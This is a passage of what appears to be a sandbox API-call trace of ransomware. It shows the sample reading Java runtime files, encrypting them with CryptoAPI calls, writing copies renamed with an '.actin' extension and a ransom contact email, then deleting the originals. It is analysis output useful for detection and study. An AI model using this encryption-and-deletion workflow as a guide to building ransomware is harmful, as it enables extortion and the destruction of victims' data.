[0153.735] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3070) returned 1 [0153.735] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.735] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.735] CryptDestroyKey (hKey=0xac3070) returned 1 [0153.735] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.736] CryptDestroyKey (hKey=0xac2d70) returned 1 [0153.736] CloseHandle (hObject=0x2f0) returned 1 [0153.736] CloseHandle (hObject=0x2f4) returned 1 [0153.736] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties")) returned 1 [0153.737] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.737] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=5712) returned 1 [0153.737] CloseHandle (hObject=0x2f4) returned 1 [0153.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties")) returned 0x20 [0153.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.737] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.737] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.738] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac32f0) returned 1 [0153.738] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.738] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x1650, lpOverlapped=0x0) returned 1 [0153.739] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1660, dwBufLen=0x1660 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1660) returned 1 [0153.739] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x1660, lpOverlapped=0x0) returned 1 [0153.741] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3030) returned 1 [0153.741] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.741] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.741] CryptDestroyKey (hKey=0xac3030) returned 1 [0153.741] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.741] CryptDestroyKey (hKey=0xac32f0) returned 1 [0153.741] CloseHandle (hObject=0x2f4) returned 1 [0153.741] CloseHandle (hObject=0x2f0) returned 1 [0153.741] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties")) returned 1 [0153.742] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.743] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3285) returned 1 [0153.743] CloseHandle (hObject=0x2f0) returned 1 [0153.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties")) returned 0x20 [0153.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.743] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.743] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.744] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2f30) returned 1 [0153.744] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.744] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xcd5, lpOverlapped=0x0) returned 1 [0153.745] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xce0, dwBufLen=0xce0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xce0) returned 1 [0153.745] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xce0, lpOverlapped=0x0) returned 1 [0153.746] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d70) returned 1 [0153.746] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.746] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0153.746] CryptDestroyKey (hKey=0xac2d70) returned 1 [0153.746] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0153.747] CryptDestroyKey (hKey=0xac2f30) returned 1 [0153.747] CloseHandle (hObject=0x2f0) returned 1 [0153.747] CloseHandle (hObject=0x2f4) returned 1 [0153.747] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties")) returned 1 [0153.748] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.748] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3409) returned 1 [0153.748] CloseHandle (hObject=0x2f4) returned 1 [0153.748] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties")) returned 0x20 [0153.748] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.748] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.748] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.749] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0153.749] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.749] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xd51, lpOverlapped=0x0) returned 1 [0153.750] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xd60, dwBufLen=0xd60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xd60) returned 1 [0153.750] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xd60, lpOverlapped=0x0) returned 1 [0153.752] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2eb0) returned 1 [0153.752] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.752] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.752] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.752] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.752] CryptDestroyKey (hKey=0xac3370) returned 1 [0153.752] CloseHandle (hObject=0x2f4) returned 1 [0153.752] CloseHandle (hObject=0x2f0) returned 1 [0153.752] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_sv.properties")) returned 1 [0153.753] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.753] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=4072) returned 1 [0153.753] CloseHandle (hObject=0x2f0) returned 1 [0153.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties")) returned 0x20 [0153.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.754] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.754] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.754] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac30b0) returned 1 [0153.754] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.754] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xfe8, lpOverlapped=0x0) returned 1 [0153.851] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xff0, dwBufLen=0xff0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xff0) returned 1 [0153.851] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xff0, lpOverlapped=0x0) returned 1 [0153.904] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d70) returned 1 [0153.905] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.905] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0153.905] CryptDestroyKey (hKey=0xac2d70) returned 1 [0153.905] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0153.907] CryptDestroyKey (hKey=0xac30b0) returned 1 [0153.907] CloseHandle (hObject=0x2f0) returned 1 [0153.907] CloseHandle (hObject=0x2f4) returned 1 [0153.909] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties")) returned 1 [0153.920] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.921] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=188024) returned 1 [0153.921] CloseHandle (hObject=0x2f0) returned 1 [0153.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar")) returned 0x20 [0153.922] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.922] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.922] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.922] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac31b0) returned 1 [0153.922] CryptSetKeyParam (hKey=0xac31b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.922] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x2de78, lpOverlapped=0x0) returned 1 [0153.927] CryptEncrypt (in: hKey=0xac31b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x2de80, dwBufLen=0x2de80 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x2de80) returned 1 [0153.927] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x2de80, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x2de80, lpOverlapped=0x0) returned 1 [0153.931] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2ff0) returned 1 [0153.931] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.931] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.931] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0153.931] WriteFile (in: hFile=0x2e0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.931] CryptDestroyKey (hKey=0xac31b0) returned 1 [0153.931] CloseHandle (hObject=0x2f0) returned 1 [0153.931] CloseHandle (hObject=0x2e0) returned 1 [0153.931] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\access-bridge-64.jar")) returned 1 [0153.933] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.934] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3860502) returned 1 [0153.934] CloseHandle (hObject=0x2e0) returned 1 [0153.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar")) returned 0x20 [0153.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0153.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" 